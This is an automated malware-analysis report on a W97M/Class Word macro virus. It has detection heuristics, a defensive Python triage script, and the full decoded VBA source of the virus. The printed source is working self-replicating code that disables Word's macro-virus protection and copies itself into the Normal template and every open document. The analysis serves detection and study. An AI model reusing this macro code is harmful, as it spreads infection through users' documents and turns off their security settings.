Verdict: MALICIOUS
Risk Score: 264
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic
The sample is a self-replicating Word macro virus of the W97M/Class family, not a downloader: nothing is fetched from the network, and the only files it writes are copies of its own macro code. It carries two infection routines. The first, autoOpen, switches off Word's macro-virus protection (Options.VirusProtection = False) and the Normal-template save prompt, exports its own module to c:\class.sys, re-imports it into the Normal template's first VBA component (or, when run from an infected template, into the active document), strips the first four lines of the import and rewrites the module so that it also runs as AutoClose and ToolsMacro. On the 14th of any month after May it shows a "VicodinES Loves You / Class.Poppy" message box. The second routine, Document_Open (also called from Document_Close and Document_New), exports the ThisDocument module to c:\footprint.$$$, copies it minus its first four lines to c:\footprint.$$1, and replaces the ThisDocument module of every open document and template that is not yet marked with a FootPrint1 custom document property, then saves the Normal template. The repeated 'Arvind8/4/99 … HP LaserJet 6P/6MP …' comment lines are not obfuscation: each generation overwrites every even-numbered line from 2 to 72 with Application.UserName, Now, ActivePrinter and ActiveWindow, so they are a trace of a previous victim's machine. ClamAV flags the document as Doc.Trojan.Class-37 and the extracted macro source as Doc.Trojan.Class-5.
Heuristics (7)

- ClamAV: Doc.Trojan.Class-37 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Class-37.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings). Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION). VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False. In this sample the replication primitive is Export to c:\class.sys followed by CodeModule.AddFromFile, DeleteLines and ReplaceLine on the Normal template, and, in Document_Open, DeleteLines/AddFromFile against the ThisDocument module of every open document and template.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: Sub autoOpen()
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: Document_Open
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE). Matched line in script: .replaceline 1, "Sub AutoClose()". Note that the match is inside a string literal: the sample's own module has no AutoClose procedure, but the copy it writes into the Normal template gets its first line rewritten to Sub AutoClose(), so the infected template fires on every document close.
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS). OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them; here ToolsMacro is also written into the replicated module by .replaceline 71, "Sub ToolsMacro()", which hijacks the Tools > Macro menu command and hides the infection from a user inspecting the template.
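As an added example (this is not the analyzer's code, not oletools, and not part of the report), the following Python re-implements the substance of the replication, AV-tampering, auto-exec and legacy-WordBasic heuristics listed above in two passes: one over decoded VBA source such as the carved macros.bas, and one over the raw bytes of the file so that WordBasic-era names still surface when no VBA project is exposed. The rule identifiers are borrowed from this report; the function names, severities, the SAMPLE_VBA excerpt (trimmed from the preview script below) and the SAMPLE_RAW byte string (a constructed stand-in, not a real OLE file) are the author's assumptions. The raw pass only sees uncompressed ASCII or UTF-16LE text; decoding compressed VBA streams is olevba's job.

```python
"""Heuristic triage for W97M/Class-style macro viruses (added example, author's code).
Rule ids follow the report; everything else here is an assumption of this example."""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str       # report-style rule id
    severity: str   # critical / high / medium / low
    evidence: str   # the line or marker that fired


AUTOEXEC = "AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit|Document_Open|Document_Close|Document_New"
WORDBASIC = "ToolsMacro|MacroFile|FileMacro|GlobMacro"

# VBE object model: a document macro that *writes* modules through it is copying itself.
VBE_OBJECT_RE = re.compile(r"\.(VBProject|VBComponents|CodeModule)\b", re.IGNORECASE)
VBE_WRITE_RE = re.compile(
    r"\.(InsertLines|DeleteLines|ReplaceLine|AddFromString|AddFromFile|Export|OrganizerCopy)\b",
    re.IGNORECASE)
AV_TAMPER_RE = re.compile(r"Options\.VirusProtection\s*=\s*False", re.IGNORECASE)
# Unanchored on purpose: fires on 'Sub AutoClose()' as a declaration *and* inside a
# string literal that ReplaceLine later writes into the infected module.
AUTOEXEC_RE = re.compile(r"\bSub\s+(" + AUTOEXEC + r")\s*\(", re.IGNORECASE)
WORDBASIC_RE = re.compile(r"\b(" + WORDBASIC + r")\b", re.IGNORECASE)
DROP_PATH_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"')  # where the virus parks a copy of itself


def drop_paths(src: str) -> list[str]:
    """Drive-letter paths in string literals: host IOCs (dropped self-copies, temp files)."""
    return sorted(set(DROP_PATH_RE.findall(src)))


def triage_vba_source(src: str) -> list[Finding]:
    """Source-level heuristics over decoded VBA (e.g. olevba's macros.bas output)."""
    lines = [ln.strip() for ln in src.splitlines() if ln.strip()]
    findings: list[Finding] = []
    writes = [ln for ln in lines if VBE_WRITE_RE.search(ln)]
    if writes and any(VBE_OBJECT_RE.search(ln) for ln in lines):
        findings.append(Finding("OLE_VBA_MACRO_VIRUS_REPLICATION", "critical", writes[0]))
    findings += [Finding("OLE_VBA_AV_TAMPER", "critical", ln) for ln in lines if AV_TAMPER_RE.search(ln)]
    seen: set[str] = set()
    for ln in lines:
        for name in AUTOEXEC_RE.findall(ln):
            if name.lower() not in seen:  # one finding per auto-exec entry point
                seen.add(name.lower())
                findings.append(Finding("OLE_VBA_AUTOEXEC", "low", ln))
    if seen:  # WordBasic-era names next to an auto-exec hook, as in the report's rule
        findings += [Finding("OLE_VBA_WORDBASIC_MARKER", "high", ln)
                     for ln in lines if WORDBASIC_RE.search(ln)][:1]
    return findings


def scan_raw_bytes(data: bytes) -> list[Finding]:
    """Raw-byte pass for legacy markers that never surface as a VBA project.
    Assumption: names are present as plain ASCII or UTF-16LE; compressed VBA streams
    are not decoded here (that is what olevba is for)."""
    def present(name: str) -> bool:
        return any(re.search(re.escape(name.encode(enc)), data, re.IGNORECASE)
                   for enc in ("ascii", "utf-16-le"))
    auto = [n for n in AUTOEXEC.split("|") if present(n)]
    legacy = [n for n in WORDBASIC.split("|") if present(n)]
    findings = [Finding("OLE_RAW_AUTOEXEC_MARKER", "low", n) for n in auto]
    if auto and legacy:  # auto-exec hook plus a WordBasic name: the report's legacy rule
        findings.append(Finding("OLE_LEGACY_WORDBASIC_MACRO_VIRUS", "high", ", ".join(auto + legacy)))
    return findings


def triage_document(data: bytes, vba_source: str | None = None) -> dict:
    """Both passes plus a verdict in the report's spirit: any critical rule => MALICIOUS."""
    findings = scan_raw_bytes(data) + (triage_vba_source(vba_source) if vba_source else [])
    severities = {f.severity for f in findings}
    verdict = "MALICIOUS" if "critical" in severities else "SUSPICIOUS" if findings else "CLEAN"
    return {"verdict": verdict, "findings": findings}


# Constructed test input: a trimmed excerpt of the decoded macro shown in this report,
# standing in for the carved macros.bas (the real sample is not needed to run this).
SAMPLE_VBA = r'''
Sub autoOpen()
Options.VirusProtection = False
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
host.CodeModule.AddFromFile ("c:\class.sys")
.replaceline 1, "Sub AutoClose()"
.replaceline 71, "Sub ToolsMacro()"
Private Sub Document_Open()
ThisDocument.VBProject.VBComponents("ThisDocument").Export "c:\footprint.$$$"
End Sub
'''
# Constructed stand-in for raw file bytes (OLE magic plus markers in both encodings);
# it is not a real document.
SAMPLE_RAW = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16
              + "AutoOpen".encode("utf-16-le") + b"\x00" * 4 + b"ToolsMacro" + b"\x00" * 4)

if __name__ == "__main__":
    result = triage_document(SAMPLE_RAW, SAMPLE_VBA)
    print(result["verdict"], "IOC paths:", drop_paths(SAMPLE_VBA))
    for f in result["findings"]:
        print(f"  [{f.severity}] {f.rule}: {f.evidence}")
```

To run this against a real document, pass the file's bytes to scan_raw_bytes and the decoded source printed by `olevba file.doc` (or returned by oletools' `VBA_Parser(path).extract_macros()` in Python) to triage_vba_source; triage_document combines the two. Any critical finding yields MALICIOUS, mirroring how the report scores the sample, and drop_paths gives the host-side IOCs (here c:\class.sys and c:\footprint.$$$) to hunt for on endpoints.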
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5966 bytes | 5511f5ee3ab6c4b3dae60cbdd1c9928ec014ab339d456b7af1e453bc84d552a8 | ClamAV: Doc.Trojan.Class-5 | unlikely |
Preview script (first 1,000 lines of the extracted script). The listing is the decoded VBA exactly as carved; the missing End Sub between the out: label and Sub ToolsMacro() is part of the sample, since the virus rewrites line 71 of the copied module into a procedure header after import.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Sub autoOpen()
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
On Error GoTo out
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Options.VirusProtection = False
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Options.SaveNormalPrompt = False
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Options.ConfirmConversions = False
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
ad = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If nt > 70 And ad > 0 Then GoTo out
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If nt < 70 Then
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End If
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If Day(Now) = 14 And (Month(Now) > 5) Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "VicodinES Loves You / Class.Poppy"
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
host.CodeModule.AddFromFile ("c:\class.sys")
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
With host.CodeModule
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
For x = 1 To 4
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
.DeleteLines 1
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Next x
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End With
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If nt < 70 Then
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
With host.CodeModule
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
.replaceline 1, "Sub AutoClose()"
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
.replaceline 71, "Sub ToolsMacro()"
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End With
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End If
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
With host.CodeModule
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
For x = 2 To 72 Step 2
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Next x
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
End With
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
out:
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Sub ToolsMacro()
'Arvind8/4/99 10:17:53 AMHP LaserJet 6P/6MP - PostScript on LPT1:clip
Sub ViewVBCode()
'Arvind4/1/99 9:36:40 AMHP LaserJet 6P/6MP - Enhanced on LPT1:clip
End Sub
Private Sub Document_Close()
On Error Resume Next
Kill "c:\footprint.$$?"
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
Private Sub Document_Open()
On Error Resume Next
Dim al As String
Dim adoc As Document
Dim atpl As Template
Dim CoL As Integer
ThisDocument.VBProject.VBComponents("ThisDocument").Export "c:\footprint.$$$"
Open "c:\footprint.$$$" For Input As #1
Open "c:\footprint.$$1" For Output As #2
Line Input #1, al
Line Input #1, al
Line Input #1, al
Line Input #1, al
While Not EOF(1)
Line Input #1, al
Print #2, al
Wend
Close 1
Close 2
For Each adoc In Documents
adoc.Sections(1).Footers(wdHeaderFooterPrimary).Range.Text = adoc.FullName
If Not adoc.CustomDocumentProperties("FootPrint1") Then
adoc.CustomDocumentProperties.Add Name:="FootPrint1", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
CoL = adoc.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
adoc.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, CoL
adoc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
End If
Next
For Each atpl In Templates
If Not atpl.CustomDocumentProperties("FootPrint1") Then
atpl.CustomDocumentProperties.Add Name:="FootPrint1", LinkToContent:=False, Value:=True, Type:=msoPropertyTypeBoolean
CoL = atpl.VBProject.VBComponents("ThisDocument").CodeModule.CountOfLines
atpl.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, CoL
atpl.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "c:\footprint.$$1"
End If
Next
NormalTemplate.Save
End Sub